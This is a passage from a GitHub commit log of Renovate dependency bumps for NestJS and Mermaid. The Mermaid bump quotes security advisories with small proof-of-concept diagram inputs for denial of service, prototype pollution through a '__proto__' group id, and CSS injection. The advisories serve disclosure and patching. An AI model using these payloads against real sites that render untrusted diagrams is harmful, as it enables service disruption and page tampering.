ai_update
100
Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
25de261c9e |
chore: bump up nestjs (#15457)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) | [`13.4.2` → `13.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.4.2/13.4.3) |  |  | | [@nestjs/bullmq](https://redirect.github.com/nestjs/bull) | [`11.0.4` → `11.0.5`](https://renovatebot.com/diffs/npm/@nestjs%2fbullmq/11.0.4/11.0.5) |  |  | | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.28` → `11.1.29`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.28/11.1.29) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.28` → `11.1.29`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.28/11.1.29) |  |  | | [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) | [`13.4.2` → `13.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.4.2/13.4.3) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.28` → `11.1.29`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.28/11.1.29) |  |  | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.28` → `11.1.29`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.28/11.1.29) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.28` → `11.1.29`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.28/11.1.29) |  |  | --- ### Release Notes <details> <summary>nestjs/graphql (@​nestjs/apollo)</summary> ### [`v13.4.3`](https://redirect.github.com/nestjs/graphql/compare/v13.4.2...v13.4.3) [Compare Source](https://redirect.github.com/nestjs/graphql/compare/v13.4.2...v13.4.3) </details> <details> <summary>nestjs/bull (@​nestjs/bullmq)</summary> ### [`v11.0.5`](https://redirect.github.com/nestjs/bull/releases/tag/%40nestjs/bullmq%4011.0.5) [Compare Source](https://redirect.github.com/nestjs/bull/compare/@nestjs/bullmq@11.0.4...@nestjs/bullmq@11.0.5) #### What's Changed - feat(bullmq): add telemetry support for workers by [@​noeljackson](https://redirect.github.com/noeljackson) in [#​2585](https://redirect.github.com/nestjs/bull/pull/2585) - feat: add forceDisconnectOnShutdown option for graceful disconnection by [@​heartz66](https://redirect.github.com/heartz66) in [#​2674](https://redirect.github.com/nestjs/bull/pull/2674) - feat: support bullmq v6 by [@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec) #### New Contributors - [@​meteorlxy](https://redirect.github.com/meteorlxy) made their first contribution in [#​2632](https://redirect.github.com/nestjs/bull/pull/2632) - [@​noeljackson](https://redirect.github.com/noeljackson) made their first contribution in [#​2585](https://redirect.github.com/nestjs/bull/pull/2585) - [@​heartz66](https://redirect.github.com/heartz66) made their first contribution in [#​2674](https://redirect.github.com/nestjs/bull/pull/2674) **Full Changelog**: <https://github.com/nestjs/bull/compare/@nestjs/bull-shared@11.0.0...@​nestjs/bullmq@11.0.5> </details> <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.29`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.29) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.28...v11.1.29) #### What's Changed - fix(core): stop import lookup after first direct export match by [@​malekelkssas](https://redirect.github.com/malekelkssas) in [#​17141](https://redirect.github.com/nestjs/nest/pull/17141) - chore: update multerExceptions constant by [@​bo0tzz](https://redirect.github.com/bo0tzz) in [#​17328](https://redirect.github.com/nestjs/nest/pull/17328) - fix(microservices): correct pub/sub client type in redis listeners by [@​zaewc](https://redirect.github.com/zaewc) in [#​17331](https://redirect.github.com/nestjs/nest/pull/17331) - feat(common): add override mimetype option to file type validator by [@​Ativ3k](https://redirect.github.com/Ativ3k) in [#​17333](https://redirect.github.com/nestjs/nest/pull/17333) - fix(core): drop the g flag from middleware overlap regexes by [@​dchaudhari7177](https://redirect.github.com/dchaudhari7177) in [#​17335](https://redirect.github.com/nestjs/nest/pull/17335) - feat(core): support sse comments by [@​kyu4583](https://redirect.github.com/kyu4583) in [#​17327](https://redirect.github.com/nestjs/nest/pull/17327) - fix(core): resolve barrier immediately when target count is zero by [@​ikrbasak](https://redirect.github.com/ikrbasak) in [#​17393](https://redirect.github.com/nestjs/nest/pull/17393) - fix(common): exclude pipe options from validator options by [@​coxxny](https://redirect.github.com/coxxny) in [#​17399](https://redirect.github.com/nestjs/nest/pull/17399) - fix(core): serialize SSE retry field when value is zero by [@​kyu4583](https://redirect.github.com/kyu4583) in [#​17360](https://redirect.github.com/nestjs/nest/pull/17360) - fix(microservices): nullify grpcclient on close when tryshutdown fails by [@​Se3do](https://redirect.github.com/Se3do) in [#​17394](https://redirect.github.com/nestjs/nest/pull/17394) - fix(express): map missing multer field nesting error by [@​Se3do](https://redirect.github.com/Se3do) in [#​17421](https://redirect.github.com/nestjs/nest/pull/17421) #### New Contributors - [@​malekelkssas](https://redirect.github.com/malekelkssas) made their first contribution in [#​17141](https://redirect.github.com/nestjs/nest/pull/17141) - [@​hjc0930](https://redirect.github.com/hjc0930) made their first contribution in [#​17311](https://redirect.github.com/nestjs/nest/pull/17311) - [@​bo0tzz](https://redirect.github.com/bo0tzz) made their first contribution in [#​17328](https://redirect.github.com/nestjs/nest/pull/17328) - [@​Ativ3k](https://redirect.github.com/Ativ3k) made their first contribution in [#​17333](https://redirect.github.com/nestjs/nest/pull/17333) - [@​dchaudhari7177](https://redirect.github.com/dchaudhari7177) made their first contribution in [#​17335](https://redirect.github.com/nestjs/nest/pull/17335) - [@​kyu4583](https://redirect.github.com/kyu4583) made their first contribution in [#​17327](https://redirect.github.com/nestjs/nest/pull/17327) - [@​anupamme](https://redirect.github.com/anupamme) made their first contribution in [#​17378](https://redirect.github.com/nestjs/nest/pull/17378) - [@​ikrbasak](https://redirect.github.com/ikrbasak) made their first contribution in [#​17393](https://redirect.github.com/nestjs/nest/pull/17393) - [@​beiifeng](https://redirect.github.com/beiifeng) made their first contribution in [#​17404](https://redirect.github.com/nestjs/nest/pull/17404) - [@​coxxny](https://redirect.github.com/coxxny) made their first contribution in [#​17399](https://redirect.github.com/nestjs/nest/pull/17399) **Full Changelog**: <https://github.com/nestjs/nest/compare/v11.1.28...v11.1.29> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4xMi4wIiwidXBkYXRlZEluVmVyIjoiNDQuMTIuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7bc349c4de |
chore: bump up mermaid version to v11.16.1 [SECURITY] (#15443)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [mermaid](https://redirect.github.com/mermaid-js/mermaid) | [`11.15.0` → `11.16.1`](https://renovatebot.com/diffs/npm/mermaid/11.15.0/11.16.1) |  |  | --- ### Mermaid XY Charts are vulnerable to an infinite loop DoS [CVE-2026-71436](https://nvd.nist.gov/vuln/detail/CVE-2026-71436) / [GHSA-2v8p-3f2j-5mp7](https://redirect.github.com/advisories/GHSA-2v8p-3f2j-5mp7) <details> <summary>More information</summary> #### Details ##### Impact Mermaid XY Charts are vulnerable to an infinite loop DoS attack in the `setXAxisRangeData()`, when configuring an X-Axis with invalid parameters. As each loop appends an element to an array, this would generally only cause an `RangeError: Invalid array length` to appear after a few seconds, but may cause the page/JavaScript process to crash due to memory exhaustion, depending on the environment. ##### Proof-of-concept ```txt xychart x-axis 1 --> 1 line [1, 2] ``` ##### Patches This has been patched in https://github.com/mermaid-js/mermaid/commit/630aa7e5dd417e1f56bff2a1ce8df2c5ad08d289 and released in [Mermaid v11.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1). A backport has been made for the v10 branch in ef60adc837d9d5107af21285f01e83dea309bd0a and was released in [Mermaid v10.9.8](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.8) ##### Workarounds There are no known workarounds. Please update to the latest version or apply the patch. ##### References - https://github.com/mermaid-js/mermaid/commit/630aa7e5dd417e1f56bff2a1ce8df2c5ad08d289 - https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1 - https://github.com/mermaid-js/mermaid/commit/ef60adc837d9d5107af21285f01e83dea309bd0a - https://github.com/mermaid-js/mermaid/releases/tag/v10.9.8 #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-2v8p-3f2j-5mp7](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-2v8p-3f2j-5mp7) - [https://github.com/mermaid-js/mermaid/pull/8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) - [https://github.com/mermaid-js/mermaid/commit/630aa7e5dd417e1f56bff2a1ce8df2c5ad08d289](https://redirect.github.com/mermaid-js/mermaid/commit/630aa7e5dd417e1f56bff2a1ce8df2c5ad08d289) - [https://github.com/mermaid-js/mermaid/commit/ef60adc837d9d5107af21285f01e83dea309bd0a](https://redirect.github.com/mermaid-js/mermaid/commit/ef60adc837d9d5107af21285f01e83dea309bd0a) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid@11.16.1) - [https://github.com/mermaid-js/mermaid/releases/tag/v10.9.8](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.8) - [https://github.com/advisories/GHSA-2v8p-3f2j-5mp7](https://redirect.github.com/advisories/GHSA-2v8p-3f2j-5mp7) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-2v8p-3f2j-5mp7) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Mermaid Architecture diagrams are vulnerable to prototype pollution [CVE-2026-71437](https://nvd.nist.gov/vuln/detail/CVE-2026-71437) / [GHSA-3rrr-jr9j-h3q3](https://redirect.github.com/advisories/GHSA-3rrr-jr9j-h3q3) <details> <summary>More information</summary> #### Details Rendering an untrusted `architecture-beta` diagram lets the diagram author write an arbitrary property with the value `horizontal` or `vertical` onto `Object.prototype`. A group id of `__proto__` is accepted as a valid parent. ##### Impact Any code in the same realm that reads a property of that name from an arbitrary object, or enumerates an object with bare `for...in`, observes the injected value (which can only be the string `horizontal` or `vertical`. This may mean corrupted option/config defaults, bypassed truthiness checks, causing denial of service or logic corruption in the embedding application. Because the injected value cannot be an object or function, this is not directly exploitable for remote code execution. ##### PoC ``` architecture-beta group mermaidPrototypePollutionMarker(cloud)[Marker] service a(server)[A] in __proto__ service b(server)[B] in mermaidPrototypePollutionMarker a:R -- L:b ``` The vulnerable write was introduced in commit [cb0a4703bdf01d47508bde1c08aa9a980d70bc20](https://redirect.github.com/mermaid-js/mermaid/commit/cb0a4703bdf01d47508bde1c08aa9a980d70bc20) and first shipped in `mermaid@11.5.0`. The lines are unchanged in every release since. ##### Patches This has been patched by https://github.com/mermaid-js/mermaid/commit/99af3fc35ef0a9a9c8c6314521344d67523ddccf, released in [Mermaid v11.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1) ##### Workarounds There are no known workarounds. Please update to a patched version. ##### References _Are there any links users can visit to find out more?_ - https://github.com/mermaid-js/mermaid/commit/99af3fc35ef0a9a9c8c6314521344d67523ddccf - https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1 #### Severity - CVSS Score: 6.5 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:H/SI:H/SA:H` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-3rrr-jr9j-h3q3](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-3rrr-jr9j-h3q3) - [https://github.com/mermaid-js/mermaid/pull/8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) - [https://github.com/mermaid-js/mermaid/commit/99af3fc35ef0a9a9c8c6314521344d67523ddccf](https://redirect.github.com/mermaid-js/mermaid/commit/99af3fc35ef0a9a9c8c6314521344d67523ddccf) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid@11.16.1) - [https://github.com/advisories/GHSA-3rrr-jr9j-h3q3](https://redirect.github.com/advisories/GHSA-3rrr-jr9j-h3q3) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-3rrr-jr9j-h3q3) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Mermaid allows CSS injection applying to sibling elements of the diagram [CVE-2026-50159](https://nvd.nist.gov/vuln/detail/CVE-2026-50159) / [GHSA-6x64-9x62-f2gx](https://redirect.github.com/advisories/GHSA-6x64-9x62-f2gx) <details> <summary>More information</summary> #### Details ##### Summary Mermaid does not fully restrict CSS to the rendered SVG subtree. Although selectors are prefixed with `#mermaid-X`, sibling (`~` and `+`) combinators can still escape the Mermaid container and inject styles to DOM elements adjacent to the diagram `<svg>`. **Most users of mermaid would not be affected by this**, as mermaid adds its `<svg>` as an only child of it's parent element. However, you may be affected if you manually insert the `<svg>` (or other elements) into the DOM yourself. ##### Details Mermaid namespaces CSS through with a middleware intended to scope all rules to the diagram's SVG element. CSS nesting expands `& ~ * { ... }` to `#svgId ~ *`, which selects all sibling elements following the SVG in the DOM, outside the diagram boundary. ##### Impact An attacker able to supply diagram source to a page (e.g., user-generated content rendered by Mermaid) could inject CSS rules affecting sibling elements to the diagram `<svg>` on the host page. This can be used for UI redressing, hiding content, conditional CSS-based probing, or phishing-style visual manipulation. JavaScript execution is not possible via this vector. ##### Patches This has been patched in https://github.com/mermaid-js/mermaid/commit/12d472c9ed43f94814b110da8d7a9ae6dd5266ed and released in [Mermaid v11.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1). A backport has been made for the v10 branch in 7e83f1533318b307764d961906a73377266f4c5e and was released in [Mermaid v10.9.8](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.8) ##### Workarounds If you are inserting the `<svg>` into the DOM yourself, you can wrap it in an element with no other children, e.g. `<div><svg>...</svg></div>` or `element.innerHTML = svg`. Alternatively, you can use `mermaid.run()` or `mermaid.initialize()` which will do this for you. Setting ["securityLevel": "sandbox"](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will also prevent this, or setting the [`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure) config value in the mermaid config to avoid allowing diagrams to modify `fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`. To test, you can try using a `themeCSS` with `& + * { /* my CSS here */}` and see if it's applied outside of your mermaid `<svg>`. ```mermaid-example --- config: themeCSS: |- & + * { background:red !important; width:100vw !important; height:100vh !important; position:fixed !important; inset:0 !important; } --- info ``` ##### References - GHSA-87f9-hvmw-gh4p/CVE-2026-41159 (related vulnerability) - https://github.com/mermaid-js/mermaid/commit/12d472c9ed43f94814b110da8d7a9ae6dd5266ed - https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1 - https://github.com/mermaid-js/mermaid/commit/7e83f1533318b307764d961906a73377266f4c5e - https://github.com/mermaid-js/mermaid/releases/tag/v10.9.8 #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-6x64-9x62-f2gx](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-6x64-9x62-f2gx) - [https://github.com/mermaid-js/mermaid/pull/8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) - [https://github.com/mermaid-js/mermaid/commit/12d472c9ed43f94814b110da8d7a9ae6dd5266ed](https://redirect.github.com/mermaid-js/mermaid/commit/12d472c9ed43f94814b110da8d7a9ae6dd5266ed) - [https://github.com/mermaid-js/mermaid/commit/7e83f1533318b307764d961906a73377266f4c5e](https://redirect.github.com/mermaid-js/mermaid/commit/7e83f1533318b307764d961906a73377266f4c5e) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid@11.16.1) - [https://github.com/mermaid-js/mermaid/releases/tag/v10.9.8](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.8) - [https://github.com/advisories/GHSA-6x64-9x62-f2gx](https://redirect.github.com/advisories/GHSA-6x64-9x62-f2gx) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-6x64-9x62-f2gx) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Mermaid configuration APIs allow prototype pollution [CVE-2026-71438](https://nvd.nist.gov/vuln/detail/CVE-2026-71438) / [GHSA-c4c3-pg64-4m4v](https://redirect.github.com/advisories/GHSA-c4c3-pg64-4m4v) <details> <summary>More information</summary> #### Details ##### Summary Mermaid's configuration setters (`mermaid.initialize`, `mermaidAPI.setConfig`, and `mermaidAPI.updateSiteConfig`) merge the caller-supplied configuration object into Mermaid's internal config using the `assignWithDepth` deep-merge helper that is vulnerable to prototype pollution. Because these APIs are intended to receive **trusted** configuration supplied by the application integrating Mermaid, Mermaid assesses the practical risk as **low**. The vulnerability is only reachable if an application forwards attacker-controlled data directly into one of these configuration entry points, which is outside their documented usage. User-controlled configuration (e.g. configuration in diagram code using `%%{init: {}}%%` or YAML frontmatter) are already protected from prototype pollution. ##### Patches This has been patched in https://github.com/mermaid-js/mermaid/commit/2cd6dcf735533b323507e3e889ffdea870540b43 and released in [Mermaid v11.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1). A backport has been made for the v10 branch in c34b07a0815842327e70794d69b0c8c5a1e2a956 and was released in [Mermaid v10.9.8](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.8) ##### Impact Mermaid believes it's unlikely that anybody is impacted, as these functions are configuration entry points expected to receive trusted, developer-controlled values as they can modify other security-relevant configuration. ##### Workarounds Don't pass user-controlled data to the `mermaid.initialize`, `mermaidAPI.setConfig`, and `mermaidAPI.updateSiteConfig` functions. Instead, users can use `%%{init: {}}%%` or YAML frontmatter in diagrams. ##### Reporters - liyi.zhou@sydney.edu.au (Liyi), https://lzhou1110.github.io/ - ziyue0530@​gmail.com (Ziyue), https://zyy0530.github.io/ - cshe0476@​uni.sydney.edu.au (Strick), https://str1ckl4nd.github.io/ - chng0012@​uni.sydney.edu.au (Maurice), http://maurice.busystar.org/ - cyu210608@​gmail.com (Chenchen), https://7thparkk.github.io/ #### Severity - CVSS Score: 2.4 / 10 (Low) - Vector String: `CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:A/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-c4c3-pg64-4m4v](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-c4c3-pg64-4m4v) - [https://github.com/mermaid-js/mermaid/pull/8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) - [https://github.com/mermaid-js/mermaid/commit/2cd6dcf735533b323507e3e889ffdea870540b43](https://redirect.github.com/mermaid-js/mermaid/commit/2cd6dcf735533b323507e3e889ffdea870540b43) - [https://github.com/mermaid-js/mermaid/commit/c34b07a0815842327e70794d69b0c8c5a1e2a956](https://redirect.github.com/mermaid-js/mermaid/commit/c34b07a0815842327e70794d69b0c8c5a1e2a956) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1) - [https://github.com/mermaid-js/mermaid/releases/tag/v10.9.8](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.8) - [https://github.com/advisories/GHSA-c4c3-pg64-4m4v](https://redirect.github.com/advisories/GHSA-c4c3-pg64-4m4v) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-c4c3-pg64-4m4v) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Mermaid radar diagrams are vulnerable to DoS [CVE-2026-71439](https://nvd.nist.gov/vuln/detail/CVE-2026-71439) / [GHSA-rhh3-jpg6-66xh](https://redirect.github.com/advisories/GHSA-rhh3-jpg6-66xh) <details> <summary>More information</summary> #### Details ##### Impact Mermaid radar diagrams allow arbitrary large values for `ticks`, which can cause high CPU usage, freezing the webpage/JavaScript process for long periods of time, until the process is eventually killed due to OOM/running out of memory. ##### Proof-of-concept ```txt radar-beta axis a, b curve c {1, 1} ticks 1000000000 ``` ##### Patches _Has the problem been patched? What versions should users upgrade to?_ This problem has been patched by https://github.com/mermaid-js/mermaid/commit/59b22fad2b3bb04f87a476c84a8a2b24679e607e, which was released in [Mermaid v11.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1) ##### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ There are no known workarounds without updating to a patched version of mermaid. ##### References _Are there any links users can visit to find out more?_ - https://github.com/mermaid-js/mermaid/commit/59b22fad2b3bb04f87a476c84a8a2b24679e607e - https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1 #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-rhh3-jpg6-66xh](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-rhh3-jpg6-66xh) - [https://github.com/mermaid-js/mermaid/pull/8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) - [https://github.com/mermaid-js/mermaid/commit/59b22fad2b3bb04f87a476c84a8a2b24679e607e](https://redirect.github.com/mermaid-js/mermaid/commit/59b22fad2b3bb04f87a476c84a8a2b24679e607e) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1) - [https://github.com/advisories/GHSA-rhh3-jpg6-66xh](https://redirect.github.com/advisories/GHSA-rhh3-jpg6-66xh) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-rhh3-jpg6-66xh) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>mermaid-js/mermaid (mermaid)</summary> ### [`v11.16.1`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.1) [Compare Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.16.0...mermaid@11.16.1) ##### Patch Changes - [#​8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) [`12d472c`](https://redirect.github.com/mermaid-js/mermaid/commit/12d472c9ed43f94814b110da8d7a9ae6dd5266ed) Thanks [@​aloisklink](https://redirect.github.com/aloisklink)! - fix: handle CSS sibling combinators in compileCSS - [#​8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) [`2cd6dcf`](https://redirect.github.com/mermaid-js/mermaid/commit/2cd6dcf735533b323507e3e889ffdea870540b43) Thanks [@​aloisklink](https://redirect.github.com/aloisklink)! - fix: increase protections against prototype pollution User-controlled input already has protections against prototype pollution. Fixes: GHSA-c4c3-pg64-4m4v - [#​8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) [`99af3fc`](https://redirect.github.com/mermaid-js/mermaid/commit/99af3fc35ef0a9a9c8c6314521344d67523ddccf) Thanks [@​aloisklink](https://redirect.github.com/aloisklink)! - fix(architecture): use `Map`s and `Set`s to store groups/services Services are now rendered in the order they are defined and more service IDs are now supported. - [#​8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) [`2cd6dcf`](https://redirect.github.com/mermaid-js/mermaid/commit/2cd6dcf735533b323507e3e889ffdea870540b43) Thanks [@​aloisklink](https://redirect.github.com/aloisklink)! - deprecate: Deprecate the `mermaidAPI.setConfig()` function Calling this function has no observable effect, as the next time a `render()` or `parse()` is called, the `currentConfig` is cleared. - [#​8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) [`630aa7e`](https://redirect.github.com/mermaid-js/mermaid/commit/630aa7e5dd417e1f56bff2a1ce8df2c5ad08d289) Thanks [@​aloisklink](https://redirect.github.com/aloisklink)! - fix(xychart): support zero-width x-axis ranges - [#​8022](https://redirect.github.com/mermaid-js/mermaid/pull/8022) [`59b22fa`](https://redirect.github.com/mermaid-js/mermaid/commit/59b22fad2b3bb04f87a476c84a8a2b24679e607e) Thanks [@​aloisklink](https://redirect.github.com/aloisklink)! - fix(radar): limit number of ticks to 32 Setting a ticks value higher than this would only show 32 ticks. ### [`v11.16.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.16.0) [Compare Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.15.0...mermaid@11.16.0) ##### Minor Changes - [#​7535](https://redirect.github.com/mermaid-js/mermaid/pull/7535) [`ea1c48f`](https://redirect.github.com/mermaid-js/mermaid/commit/ea1c48f53fce5d025388d386c90da8743ee25b13) Thanks [@​ragelink](https://redirect.github.com/ragelink)! - feat(cynefin): Adds the Cynefin framework as a new diagram type (beta) to Mermaid (available as `cynefin-beta`). The Cynefin framework, created by Dave Snowden, is a decision-making framework that categorizes problems into five complexity domains, widely used in agile, incident management, strategy, and organizational design. - [#​7721](https://redirect.github.com/mermaid-js/mermaid/pull/7721) [`f45cc2c`](https://redirect.github.com/mermaid-js/mermaid/commit/f45cc2cc5683b90990e374a463b7bcad0fd68a38) Thanks [@​notionparallax](https://redirect.github.com/notionparallax)! - feat(treeView): add box-drawing character input support for treeView diagrams - [#​7550](https://redirect.github.com/mermaid-js/mermaid/pull/7550) [`f1f4d45`](https://redirect.github.com/mermaid-js/mermaid/commit/f1f4d45ee0513b64a2bd280087d31656f9d2c786) Thanks [@​DominicBurkart](https://redirect.github.com/DominicBurkart)! - feat(xychart): add per-point text labels for xychart line plots - [#​7527](https://redirect.github.com/mermaid-js/mermaid/pull/7527) [`b4d0442`](https://redirect.github.com/mermaid-js/mermaid/commit/b4d0442dd1628acb3f71681519e7f47fc8bacf55) Thanks [@​notionparallax](https://redirect.github.com/notionparallax)! - feat(treeView): Extends the existing treeView-beta diagram with features useful for representing file/directory structures. - [#​7793](https://redirect.github.com/mermaid-js/mermaid/pull/7793) [`a6f097d`](https://redirect.github.com/mermaid-js/mermaid/commit/a6f097d580d459dfc3ade3e21030037341f79940) Thanks [@​SSDWGG](https://redirect.github.com/SSDWGG)! - feat(er): support optional ER attribute types with a `?` suffix - [#​7772](https://redirect.github.com/mermaid-js/mermaid/pull/7772) [`37f2e36`](https://redirect.github.com/mermaid-js/mermaid/commit/37f2e36fa017698b66093ac5518396523a7a3241) Thanks [@​devareddy05](https://redirect.github.com/devareddy05)! - feat(gantt): support multiple `excludes` / `includes` lines so long exclusion lists can be split into commented groups ([#​6270](https://redirect.github.com/mermaid-js/mermaid/issues/6270)) - [#​7708](https://redirect.github.com/mermaid-js/mermaid/pull/7708) [`4e63e9d`](https://redirect.github.com/mermaid-js/mermaid/commit/4e63e9d338b6476df283afd4a002072945bc4563) Thanks [@​txmxthy](https://redirect.github.com/txmxthy)! - feat(architecture): add `align row|column {ids…}` directive to architecture-beta diagrams so authors can declare horizontal or vertical alignment of services explicitly. - [#​7760](https://redirect.github.com/mermaid-js/mermaid/pull/7760) [`05223be`](https://redirect.github.com/mermaid-js/mermaid/commit/05223bee47a424be3ba7805e753b96861d342765) Thanks [@​ngdaniels](https://redirect.github.com/ngdaniels)! - feat(pie): Enhance Pie Chart - Enable donut chart, Set legend position, and highlight slice - [#​7251](https://redirect.github.com/mermaid-js/mermaid/pull/7251) [`216e4e9`](https://redirect.github.com/mermaid-js/mermaid/commit/216e4e9a61afceae885b00854f79e17373ccad31) Thanks [@​ydah](https://redirect.github.com/ydah)! - feat(railroad): Add support for Railroad Diagrams (Syntax Diagrams) with four input syntaxes: IR (railroad-beta), EBNF (railroad-ebnf-beta), ABNF 